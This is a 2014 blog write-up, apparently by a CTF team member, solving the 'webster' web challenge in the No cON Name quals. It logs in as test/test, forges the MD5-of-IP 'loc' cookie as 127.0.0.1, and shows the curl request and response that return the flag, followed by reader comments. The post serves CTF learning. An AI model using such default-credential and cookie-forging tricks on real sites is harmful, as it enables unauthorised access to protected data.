This year «No cON Name Capture The Flag» quals had more than three challenges to compete for the final, so big thanks to organizers to extend last year limit. At now ( 09:27 am GMT+2 ), @DefCon-UA (dcua team) have finished all challenges and have left +12 hours for competition’s end. So it’s time to draft some web write-ups.
First «webster» 200 points web challenge, show us a login form that after multiples sqli, xpath, ldap… injections with no luck, tried login common accounts.
Username ‘test’ and password ‘test’ was the lucky one to access main private area.
We have id, filename, location, username on 4 files where captain obvious says flag.txt is our target file. But not to fast, something is blocking our tries to read this file. It says:
"Seems that you are not in the right place for that"
So am i not in the right place? where could we go to get permissions on that file ? See the cookies, pay close attention in one called ‘loc’:
Oh! Seems md5 for something we can’t find in our first try. But wait, maybe location means ip ? let’s try wuth the one appears on the column;
>>> ip='10.128.29.136' >>> hashlib.md5(ip).hexdigest() 'c869d000ef5c6fdfa128b058d2865512'
Yes! It’s the same ip in hash format, so can you figure out the rest? Let’s try to replace this cookie with 127.0.0.1 (f528764d624db129b32c21fbca0cb8d6) location.
$ curl -vvv -k 'https://ctf.noconname.org/webster/content.php?op=4' -H 'Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test; PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;' * Adding handle: conn: 0x7fe7cb804000 * Adding handle: send: 0 * Adding handle: recv: 0 * Curl_addHandleToPipeline: length: 1 * - Conn 0 (0x7fe7cb804000) send_pipe: 1, recv_pipe: 0 * About to connect() to ctf.noconname.org port 443 (#0) * Trying 88.87.208.202... * Connected to ctf.noconname.org (88.87.208.202) port 443 (#0) * TLS 1.0 connection using TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA * Server certificate: ctf.noconname.org > GET /webster/content.php?op=4 HTTP/1.1 > User-Agent: curl/7.30.0 > Host: ctf.noconname.org > Accept: */* > Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test; PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04; > < HTTP/1.1 200 OK * Server nginx is not blacklisted < Server: nginx < Date: Sun, 14 Sep 2014 08:55:48 GMT < Content-Type: text/html < Content-Length: 38 < Connection: keep-alive < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache < Strict-Transport-Security: max-age=15768000 NCN_f528764d624db129b32c21fbca0cb8d6
flag: NCN_f528764d624db129b32c21fbca0cb8d6
ps: Thanks to my dcua team mates.
Longinos Recuero Bustos
septiembre 15, 2014An excellent explanation. Best imposilble!
See you soon!!
tunelko
septiembre 15, 2014Thanks :)
dook
septiembre 15, 2014Awesome! Been searching for some writeups from NCN, yours is the best so far. Nice detail, screenshots and explains it well.
Many Thanks
And congrats to your team! :)
tunelko
septiembre 15, 2014I’m sure more writeups will be published, what team are you ?
Thanks for your comments!